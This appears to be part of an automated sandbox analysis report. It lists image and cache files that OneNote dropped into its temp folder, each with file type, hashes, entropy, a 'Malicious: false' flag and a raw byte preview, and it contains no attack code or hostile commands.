C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000077.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	25622
Entropy (8bit):	7.058784902089801
Encrypted:	false
SSDEEP:	384:EhK81gTCyJ/Gf9Aw3t8w8EtdPeGDh6bEi1Ie1u4ZbvgwTwrSRh7ZKNpIGY:IjcRXwdJvtdGsUbEi1IeY8vgwTyC1+Y
MD5:	F8CCFC24DEB1D991EBE085E1B2D7D9BF
SHA1:	AF76C22A765434AEDA134924C517C84107F4FED5
SHA-256:	7354001527AB554C44E7D6981B86DD933B7DC2E0D3DC8512AD3EECD843245C52
SHA-512:	818BC3690B01B30BC571E4CF45EC8D1AFCAECBAB003532644381F1CF730A5B3486862D08F7579B2D3D89167AD7DF35028881245C9550B0DA23D1F81A720A9704
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!...1A.Qaq.........."2Rr.#.t6..B..3S$4..v.b..Cs.%5..8..cUV.(.DEe.&Ff...T.d.......................!.1A..Qaq...s4....2r..S"BR.3....b#C$.....c............?..D.."}:......&&...?3..W.q.......]...m.Y.k1......K).J...uV.b.../.0.E.H..4..W_T.[t.V.w.9.x.qe.L..o.oL.....d.\.....6.\|.o...}..H{Yn..E...6Y3.l.e..D.:,.n.%...t...m.........,+,..\|..n.....6....f........6.../$../Vi..H...e.f.F.zn.).n.E..2sTn.i...Yb?6+H&...Bf......z.o.^7[..u.:o....t.s=.....(.s.....f.g....q9o.u1L.N...smzE..[>...+\O....j.<....j.c.W.............U..+.F/.'..W...T./W...>i01./....j.s."..Q...{...a._~OW...Rp.).e..W..Q4)<..'..W...q...'..U..z..g......U}...O....w....0F:.N..V.3W.\|..'z0.]...j..U[v..g$D.Lc[.e...UW.m0+

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000078.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.320302744251664
Encrypted:	false
SSDEEP:	48:Yubx0sMbc0BUEFxs0kTtuyEHGKlXZ+9U/Cj4p7rd3rUGmexl50dXqZWUEQN0oeUZ:YSx0smIL0kTrEmOXc9UaURbBme0KP
MD5:	5E81A38B421E48836A88222238786369
SHA1:	060A1F8E3507F22828E48FD7E30940659935DD72
SHA-256:	B0308C35B448BCCCB0E0EE9D464571811F673012BAC54B385E4C4247545E7BBB
SHA-512:	B075396C74F945FD577C1CE38AF806CFDBE34C3F8A5B9BA8B3F5430B1139EA624E5785039427C8CB44A5CB43F9CF3A3EFF9788C6E8FC434C915454D37E7328E6
Malicious:	false
Preview:	2...>.......P...v...D...................................................?....?..........................................................................2...>...,.......v...x............................I.......I.qk..B.....LZ.W.......W..~U`.#u..;e.p.W..~U`.#u..;e.p.W...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............OG...#_...$.....N...^.................:...M..d............f........................................I.qk..B.....LZ..............OG...#_...$...........OG...#_...$...........W.......W.......W...........................................W.j.....W.T.]...W.......W...B...W.H.....W...B...W...>.).W...J...................;........4...4...4.."...............W...W...W...z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4..........W.......W.....#.W.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\00000079.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 50 x 500, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2033
Entropy (8bit):	6.8741208714657
Encrypted:	false
SSDEEP:	48:P37XYSDTz+UUl7DHt7Ah8l1+4ZfFclFUXwobKXlZr:v7j3z+UoDN0h8ugf2AwobMN
MD5:	CA7D2BECCBC3741D73453DCF21D846E0
SHA1:	E34B7788498E33FFF0CFB00125E6BA9E090F6CED
SHA-256:	E9EAD0BFC09D32CB366010CDFEDE1C432A2D1D550CB7332BADAC1BEE9482BC86
SHA-512:	7FE2C3654262B1EEBED4F6D83DA7D3450E1BE52500A3964185FC0092041506A237A2728E5D7EEA0A3814E413E822B803B789C49CF744D51816A2E4EDE5B4247B
Malicious:	false
Preview:	.PNG........IHDR...2.........H'......PLTE........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................[....bKGD....H....cmPPJCmp0712....H.s.....IDATx^.\.W.G...=a.ewA..a.!r( ...%Dc..x.x....N.OO...3=...S...........~.z.D.0...g.2P.7.*M.#'....z.......3TPj.Z.[5....V..z'L3...a.j9..C>..9.z

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007A.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.343846399053039
Encrypted:	false
SSDEEP:	48:N8sVPPb5YtLhtEkJL0XLz90uuj4Zrd3rgxDdXp9fDdxd:6sR5Y9E8oXv90LcRb4/x
MD5:	23E237D57CF9EF5240E4B916E5922652
SHA1:	DEB45186724B4DD6A07FD84CDCCF39F248B540DA
SHA-256:	4152F83BFB0B3B171D5AE03BC7648437AE631367279787A0002BD0850B847EC4
SHA-512:	90F4FA2820A1204BE4FCD061C5522A530BB3B7B7F3094F7ACE53E6837F628B803304236612E29C8A4FD70595731787C79BEE08506702ACD0CABFA06FB9D0779D
Malicious:	false
Preview:	2...>.......N...v...B...................................................................................................................................2...>...*.......v...v............................I.......I.qk..B.....LZ...........>W...,.0V.W....>W...,.0V.W......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............,..o.+."x\|.........N...^................\.$..M.U.=.,[.........f........................................I.qk..B.....LZ.............,..o.+."x\|..............,..o.+."x\|.............................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007B.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	55804
Entropy (8bit):	7.433623355028275
Encrypted:	false
SSDEEP:	1536:gVvci05lhVbfBcWvBLeynluexaWqzww/u5:gVUZhHDljaHww/u5
MD5:	4126992F65FE53D3E3E78F6B27FD49DC
SHA1:	BC0D76B69310DA9B909D3EE4CECBFE5F386BFB45
SHA-256:	3FBE3C1C238BD7DBC67F8CFF5F3BDDFD513C96A9851B9616477947D21DFF4B2E
SHA-512:	624853F5E56D224C8188F122B2C4724F867D4099E7FAAFB9C945BE7E2907900ADCF4AE97AB08909CF94E96FB6F381E3B6396D560D93EB2731E4E69CBFE628F10
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d..............................................................................................!1...AQ.aq"2.....BR..8x..r#..9b....3....CS$.'.cs.......7Gw.(.4%5&..Wg.h......tEVfv..H..........................!1A..Qa.q...."2..u6....BRr.#...b..3s..d...7.Cc.$Tt..S4.5Ue..&..%.................?...,...8..{..S.y.N....%..q.8..H[5....o..xg........)c(.eO.YO..._D..x.U.....%.S.r.r._.^..Su.h.Q.t.:.#?....x..B.S...Q.....oqF..%..8'.qx....%.2JKjF..{y.w0.a.RMb.c.Q{%....eW'..[IV..'ZW3...[...MN.....rO.:....$.i..7....Vrrr...I.r..M..Qo..j....q.^...N...J......%.J..)F...>$.....u........o...+......[.....t....R}.I..R..S..GB..:......).6_[^Xft...F.1.....zP....,.#....MG.T..Q.F.....)Fi../.I...,%.voEb.b.Z..V3..FT.}..[Z{....wd.z.e.....QwW(.).t..\..'....:)<W.<..&k...caRT.X(..K.....:f...]...q..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007C.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.444585792017674
Encrypted:	false
SSDEEP:	48:wseyfc2KPGt+vUtefEbzTX3kt690tj4GKrdMrP3/fdXeCOkiQt:wsBcpPGoU6ETXUk90t8RMP5
MD5:	4C7CEDA9E6E9FFC9F5EFFDCF4726A006
SHA1:	AB7F610CA43A5E4696A105E8E7EB69C75073300D
SHA-256:	2DBA5DA08117885A624446D74299C40A75AEC50FF57B61E57A587D898FA46268
SHA-512:	680BCB5F29D016879472BD7555A59A6FA96F6C163D9867A8A7C47C6D74619831D722C0999C43A5870D88F4119D1B0D8FFBF994D195796EFDE462ED9E3B2F6FBC
Malicious:	false
Preview:	2...>.......n...v...b...................................................................................................................................2...>...J.......v................................I.......I.qk..B.....LZ].......].......$..(%H.b].......$..(%H.b]....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................l.4Q....}l.A....N...^...............[...\|..H...+..mm........f........................................I.qk..B.....LZ...............l.4Q....}l.A...........l.4Q....}l.A.........].......].......]...........................................]..j....]..T.]..].......]....B..]..H....]....B..]....>.)]....J...................;........4...4...4.."..............]...]...]....z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4.........].......]......#]..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007D.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop CS Windows, datetime=2004:03:12 11:08:07], baseline, precision 8, 595x450, components 3
Category:	dropped
Size (bytes):	59832
Entropy (8bit):	7.308211468398169
Encrypted:	false
SSDEEP:	1536:HS9SYFtN0+CRa9mfJy4zBAiIJhzrkHDV2hJK:yAmta+Tyy4zBIJW5WK
MD5:	DCDD543A4E0BA2C1909BA095D46FFBCB
SHA1:	B86C89537138FE07255354202D3EAD0B53B3C54D
SHA-256:	28F334B77068F71F5F92A95695433B950610204A0E5580CE567DB8FAD4993ECB
SHA-512:	5408C3259B7F3288A4BEB04342799AD5FE3A6F0EC7E92353B29B7E7E538DFA9903B39637226919E0421BC422635D25F5F8069DC7441864DC03E1B909BF5C2C84
Malicious:	false
Preview:	......JFIF.....H.H.....fExif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop CS Windows.2004:03:12 11:08:07.............................S.......................................................&.(.................................0.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d.................................................................................................................................................y...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?......;R~+'....xh..~.n-}.......Te................^B..IU_....._...S......h.......!....9...A}6V=J......C..c.....Ug.Wh......

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007E.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.34507166082331
Encrypted:	false
SSDEEP:	48:3sPUp4xoYotMctUEQ28Xt9gGpbHOj4VrdMrGTdX9AianGtbiBXZ+g:3sFoYomcWEaXt9vOARMkYw
MD5:	C5D5534FEF43C9C3FA9A8A67F04C8051
SHA1:	2BA90106C97786332C87749316527507ADCA6F5A
SHA-256:	2B038B783396227A1E5835F6B168A925234B137CCF92492704B7A9C6C03A5E92
SHA-512:	262B3BAC416C92C56C17FD1D160C5CAC42D2D5447567AF4910059FCF10F3AA4EB461DF7302DE17EC7E3E2C51A81A2DADAAE29DEC094B0DF0C989A85864A1E165
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ...........?.?.....`.....?.?.....`.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................T.......\v.8.....N...^................bx&+.[N....7...........H........................................I.qk..B.....LZ...............T.......\v.8............T.......\v.8.....................................................................j......T.^.............B......C......>......\|.... .3...................;........4...4...4.."........................z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4......................#..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007F.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	Windows Enhanced Metafile (EMF) image data version 0x10000
Category:	dropped
Size (bytes):	33032
Entropy (8bit):	2.941351060644542
Encrypted:	false
SSDEEP:	384:ofmqvnCfmqsp1Ue5xzMq+Qh0dffUmS0w5xzMq+Qh0di:AGAp1rmSl
MD5:	ACF4A9F470281F475EA45E113E9FB009
SHA1:	B20698DDA5E5AFDD86BB359A6578C9860D5DF71F
SHA-256:	5DC2367A80588A7518DB5014122510BF0FD784711015EF83A8718336584F82D0
SHA-512:	998B7DB9DB08FD15A293267E2371052E436E024AF8D34F96D3C8FF04B1316678DFC1674C921CB404121FF381A4FC39DC759E6698F19D42A6261CBD39469B0A08
Malicious:	false
Preview:	....l...........................Ac...... EMF........$...................`...E...........................(...F...,... ...EMF+.@..................,...,...F...\...P...EMF+"@...........@..........$@..........0@.............?!@...........@..........F...(.......GDIC........................F...(.......GDIC............^...........F...........EMF+*@..$..........?...........?.........@..X...L........................."B...B...B...................?...........??.....n............;...<..@<...<...<...<...<...=...=.. =..0=..@=..P=..`=..p=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...=...>...>...>...>...>...>...>...>.. >..$>..(>..,>..0>..4>..8>..<>..@>..D>..H>..L>..P>..T>..X>..\>..`>..d>..h>..l>..p>..t>..x>..\|>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...>...?...?...?...?...?...?

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007G.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 3005 x 184, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	12180
Entropy (8bit):	5.318266117301791
Encrypted:	false
SSDEEP:	96:k1bHyG/fKOOOOQJUg+g2S+kEm6alfsfsfn32:+bSG/yOOOOQ+g+gOab32
MD5:	5C859FF69B3A271A9AAB08DFA21E8894
SHA1:	3156302A7450ADFF4D1B6EC893E955D3764D4DD4
SHA-256:	B4A8E9A67EE0B897615AC4CCE388FFC175AB92D9E192E6875C79A4E7C1B5BB6E
SHA-512:	4CF518136EEBCA4F400A115D9B7BB0CAC9FA650BF910B99E15F04A259B7D3EFCFFD6796886FE09DB08C37C332B14BC8500845C09C8EAE1F2306F90E98D3C99E0
Malicious:	false
Preview:	.PNG........IHDR..............;j.....sRGB.........pHYs..........+..../9IDATx^...dW...S=.dL$.............-.`...'...x.7.D...(...$.?cO....9S]=.v...Z.......{..wNuf.&.....a.k5~...._..\.yk..v.....}{._.Q...5...._9o.n.....}7.].1v..t......q....3.<..0<.p.......0....s...... @....... @....... @....... @....... @...X.'..U-..... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%@....... @....... @....... @....... @....... @....../)m.. @....... @....... @....... @....... @....... @ ....`.)....... @....... @....... @....... @....... @....K.0.....J....... @....... @....... @....... @....... @...`.....\.... @....... @....... @....... @....... @......,I......+..... @....... @....... @....... @....... @........z...r.. @....... @....... @....... @....... @....... .$.C.KJ[.... @....... @....... @....... @....... @........&`.=X`.%

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007H.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.342655326524829
Encrypted:	false
SSDEEP:	48:YsYmhtPAIqtExSEPEczowL4LXTw/L9f8skp575rdMraqqQX+E90GN:YsrPAIqy0EsAoweXUj9UhL5RMSY
MD5:	C97607817C1C48FD2DFCC9AE0BF6F47D
SHA1:	00A18788B5D2ADC09F033E04551034708FE25C92
SHA-256:	F09680703FB9179550B0105FC765515AF269CCE717C02C16660468684682D458
SHA-512:	2C9093E868C0095D42C67C29E00060B5A4CE23411C4E6C764E1AE68C1E602533D5AFF138491D026E162A08B5D80E7626E82A74C02EC007B45DA862687C63DB64
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ\|.......\|.......2..X...a\|.......2..X...a\|....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............I4.........}.....N...^................N...L..;m...........f........................................I.qk..B.....LZ.............I4.........}..........I4.........}..........\|.......\|.......\|...........................................\|..j....\|..T.]..\|.......\|....B..\|..H....\|....B..\|....>.)\|....J...................;........4...4...4.."..............\|...\|...\|....z...y.. x.. ...........$........4...+..7+..7........................;........4...4...4.........\|.......\|......#\|..............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007I.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 39 x 600, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	2104
Entropy (8bit):	7.252780160030615
Encrypted:	false
SSDEEP:	48:2PPEOtz2P/LJtVRaqBG8qFOPvHlcEXgkuwf+j:2PZFSjJDjqFOPPlXgG+j
MD5:	F6C596F505504044DF1E36BA5DA3F09B
SHA1:	BCF17EC408899B822492B47E307DE638CC792447
SHA-256:	EDBB86F160050FBF1F9860276802BAE292DBFD0BC98E3EA90D43D981E9F0C54A
SHA-512:	E8D067A1932CED8746FE7D665EEC34EA92A98AFF3DF26FFA9DD02742DDEA3C5654124A88A649FA33DB596F96A5FC9CB2C693D03132F1C8B254ACB56DB4763BD8
Malicious:	false
Preview:	.PNG........IHDR...'...X.......:....PLTE.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................{.....bKGD....H....cmPPJCmp0712....H.s.....IDATx^..c.%i.F...m.m.f.m.m.m{&....X...9.....M.WUW.d.N.O...E$...$...)H....n....N.k..v.....v1L[w)w.}..!...Y.X.V.D.......[....;..[..;....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007J.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.349903620681436
Encrypted:	false
SSDEEP:	48:msCrEFSateFCsE2JlZrtXh39NsqhpyFrdMrrIUPFXMsz5og:msTFSaAZE2PXh9NRhQRM5PPo
MD5:	54F7085EFED18CB50C21F8BA56E7F760
SHA1:	819C03ACCE8344B2F7EFFF30515864D4893614D9
SHA-256:	562E1D6CE0E8C4BE91E4BED8EF059F73017343A6C5A8A04C1F2AC63ACAE6FE5C
SHA-512:	4CAD9E0B122F4D50ED08E84E14DA9CBD5DCB2E473C79A2B55E19816B088391198992CC2B136ACA31ACB369CC77815D452BAA1C5C3112E658BAC22C6C72962AB2
Malicious:	false
Preview:	2...>.......T...v...H...................................................................................................................................2...>...0.......v...\|............................I.......I.qk..B.....LZ.`.......`......,..Z(...`......,..Z(...`...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................Y.7]."..G.6/L....N...^................u...f.K.m...3.........f........................................I.qk..B.....LZ...............Y.7]."..G.6/L...........Y.7]."..G.6/L..........`.......`.......`...........................................`.j.....`.T.]...`.......`...B...`.H.....`...B...`...>.).`...J...................;........4...4...4.."...............`...`...`...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........`.......`.....#.`.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007K.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	14177
Entropy (8bit):	5.705782002886174
Encrypted:	false
SSDEEP:	192:EbgGcV/hlvpfal7rgYa8S7auAxwfuSTmCSNoFQ6NO7L:EbgGcVnpwimnd38FdQL
MD5:	7CDCE7EEBF795998DA6CAC11D363291C
SHA1:	183B4CC25B50A80D3EC7CCE4BF445BCFBAA6F224
SHA-256:	DE35AF949D4F83E97EE22F817AFE2531CC4B59FF9EE6026DCA7ECEBC5CF2737F
SHA-512:	560FB15A9C12758D11BB40B742A6EAD755F15AD10D6C5DEBA67F7BC8A2AE67C860831914CBCBCDED9E6B2D1D5F26A636B9BCEF178151F70B4D027316F94F27E1
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d........................................................................................!.1..A....Qa".q..2.....&...B%6.'..R#3.$E.r457bS.DUFV.Wg(.......................1...3.Q..2Rr....s.4.!Aq.S.aC5B$%............?...n.Liq.}.{#....3/gg.1.M +..~3...q..+=..:.g.i1;P)7.....q..n.s"p...wx........v.t.f;..L/..~....y.r[.r.....n.n3..6i..g..}../........3..x.L.i?We..l.......~..<.;..6..o.....N.t.o6.l..~.......<...m.V...Q.7k.u./wq.t..;.I...}..{...>.L..3m..a....yd......6~.f..~Y..}+..<.[w..'-..?.v.7...v.u..4.......1];..u.MO.......s..p..ms.'.O-o...O......m.k.e....)t....i>..E\|....,iOyD\|.{......g.n...cu....=..........h.\.Q:?g/?.I.3._...t...d.n.0.%y....S.Q....S.&K.w..&wY<....%.g.v.....$y..#,i;.=...t...I6..yO..o.d..w\k...~......)..rK.......].u....N....e.s..kU.u..'}

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007L.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.345689087287112
Encrypted:	false
SSDEEP:	96:oskK0LykDHBEQbXr7Hdm9Tt/IRMWIvq6e/qV3t:oskK0LyEeQbXrjdm9Tt/IRMWIvq6e/qP
MD5:	792CCD16D7577A33E45F45CCB290CB14
SHA1:	CAEA69E75F8C5F03962E0EAB629A9BFD3BAF5C77
SHA-256:	7530F57E5119DB974388458A69CBD4E6892EDD56E4943642F7675CE6B6DB9004
SHA-512:	618362022D4A66A007921313B009AB0AF2B2F72A311951AC13ABA1D47EAF18E96862A07B53A8F0F27FD633A51590012FB6EA5C4AAAF5D2776E0BD8322CCE0636
Malicious:	false
Preview:	2...>.......R...v...F...................................................................................................................................2...>...........v...z............................I.......I.qk..B.....LZ.?.......?...Q@...e...2..?...Q@...e...2..?...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............d...p'.=...T6.....N...^................-." G....u...........f........................................I.qk..B.....LZ.............d...p'.=...T6..........d...p'.=...T6...........?.......?.......?...........................................?.j.....?.T.]...?.......?..B...?.H.....?...B...?...>.).?...J...................;........4...4...4.."...............?...?...?...z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4..........?.......?.....#.?.............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007M.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:44:07], progressive, precision 8, 611x163, components 3
Category:	dropped
Size (bytes):	36740
Entropy (8bit):	7.48266872907324
Encrypted:	false
SSDEEP:	768:3nwDxjTvoE0Rjwit4rjucDILWg7/Da0JgGQ8e1S8SA/Khos0:SxjTmZw7nucDILj77a0JgGQvScb
MD5:	9C205C8D770516C5AA70D31B2CA00AF3
SHA1:	9A1002F0CF7F92F1BE2BB25BAD61CEBFAC282482
SHA-256:	E111F96490755C7D71E87C88ACAEA38AFE55BB865B1A14A83C5BD239648D5E2C
SHA-512:	A3E105208B32831265428572B0937DD3C17B793D8611B2DA8D4939F1BEC6050999D375E3F6B87D53AD49DFA0EAE737B0141D37597AA42116C310761973D4A134
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:44:07............................c.........................................................(.....................&...........n.......H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d................................................................................................................................................."...."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..o...4.gP.~.c...K{...V.=...].<.........vS.........s....(.t......X......kk7....~-...yF}^c.Z.\.G./.?t...>....:.>......./.ib..).

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007N.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.413558206812887
Encrypted:	false
SSDEEP:	96:bnxsJZKr9A2iELaXHs2P99vwRMrd/C7K3A:VsJZKZLLaXH399vwRMrd/C7d
MD5:	28357CA51CD62FBAED3737CA4E6A5F82
SHA1:	9FEDFE22C30FE327E628AFC33D5E9B5DB2BA65BE
SHA-256:	5DF1A040628B4C4F594E37ECED7FF4188B36A6A3EB21DEC3E7881C8D7213E2C7
SHA-512:	A292D4B33DDE1A29D4E034D41CB304507F9D026A98FC2A91329EA60B5E2B3FE3CFF715B3B7FACF5DC531E1CE425C022D7D920B9781F52BC65440B8801537A037
Malicious:	false
Preview:	2...>.......l...v...`...................................................................................................................................2...>...H.......v................................I.......I.qk..B.....LZ..............p..Wg~.........p..Wg~........I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............a.C.I.4....j.0....N...^...................[}H.H.N...........f........................................I.qk..B.....LZ..............a.C.I.4....j.0..........a.C.I.4....j.0........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4...,..7,..7........................;........4...4...4........................#...............................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007O.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	53259
Entropy (8bit):	7.651662052139301
Encrypted:	false
SSDEEP:	768:dCiCBBenRYWDBCipMYGTbYGLHbXxoP/qEF+MU50qyJ30h2W474S/Aq/xc4674bi5:dCiIQXBCiwbDLHD0/sFyVel4Pi4UgE
MD5:	2EE369ABB7936F8C28FF0ABDD224EA05
SHA1:	FE9D304A7B49E31EAE439369ABC548E265149636
SHA-256:	FB12D59B8BE911247BBAFDD416852E8B74B028005A141CB4DBBBA109B4B6ED2C
SHA-512:	5CF396CA472C32AE988600176114106CB1619404DD899A3867A5AB43DC90583B771EF69B14EF50E56A21F038BF51D8463C6ADD2DE9D4CB523F6290E24A4DECB3
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..AQa....q........"2..R..Bbr..#S....3$.....C.4v..(X.DtEUV.....cs..Td.5uf'Wgw8Hh........................!1Q.Aa....q.2...."R...r..3.t..U...B#S.4ub..C$d.5Ee&'7c.D%sT..............?.....?...k,lk^...M".Yo5.Qp.&s}b.m.:...W.x}..a......N1..d-n.-..^..b..TZ.W..."....F....^......ve5...^...2.:i...........~u2pK.z./&..u..L[I....Y....@y{\|>..MN=:....Q[..H....a........\|%..4fV....).....^.9b.f...F...p.=.W...aZ.........Z.t.n.....z3..[..lVh..\.N-.._.sK.y.._e.G.jig.a.7^....u....p.5.a.].........u/u..D.yl.XA..f.z..~.x.....N.....b=.uv.2.t.'.N.-.H..n.v.a.A[.Z.....T2...._...:....h..l.E..sm..a.3I...RE...fWb.Ek.0.#.)..Y#T...........u{....U....s.].7_H.2.`O6...P......}..4LR....]4.mid...

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000007P.bin

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.33290148337722
Encrypted:	false
SSDEEP:	48:asq0u8sivitMBi7PEXDJV2Xpb9hsbpyRrdMrVP45FXX9T/xWeyw9:asK/iviKBiTEXyXpb9hiURMB45r/YeT
MD5:	AFB3B249032F6230CCD7180868C4D3C8
SHA1:	094616EA257A89065A2EB108464C95CDB9BE537F
SHA-256:	2B85C6EED121B2FEA3D77D3350EF54C34C78F5002DA899B948AE9177CED2F5F5
SHA-512:	9DC75C9328FC336D5D428DABBA470452F0D28C7A1CA0512CFCBF03E7BF1D400B07127FE4F3F9B0E28318FF8A69F68007640EE1F092640E255E00EA4AF4DFD23A
Malicious:	false
